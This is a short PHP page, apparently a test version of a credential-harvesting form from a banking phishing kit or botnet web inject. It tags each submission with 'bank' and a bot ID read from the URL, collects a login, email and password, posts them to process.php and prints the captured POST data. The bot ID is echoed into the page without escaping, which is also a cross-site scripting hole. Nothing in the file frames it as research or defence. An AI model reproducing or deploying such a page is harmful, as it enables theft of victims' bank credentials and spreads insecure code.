<?php
$parameter = "bank";
$botid = $_GET['botid'];
?>
<html>
<head>
<meta charset="utf-8">
<title>TEST</title>
</head>
<body>
<form action="process.php" method="post">
<input type="text" class="field-password" id="password" name="login" placeholder="login">
<input type="email" class="field" id="email" name="email" placeholder="Email Address" autocomplete="off">
<input type="hidden" name="parameter" value="<?=$parameter ?>" />
<input type="hidden" name="botid" value="<?=$botid ?>" />
<input type="password" class="field-password" id="password" name="password" placeholder="Password">
<input type="submit" class="button" name="submit" id="input_next1" value="Log In">
</form>
</body>
</html>
<?
print_r($_POST);
?>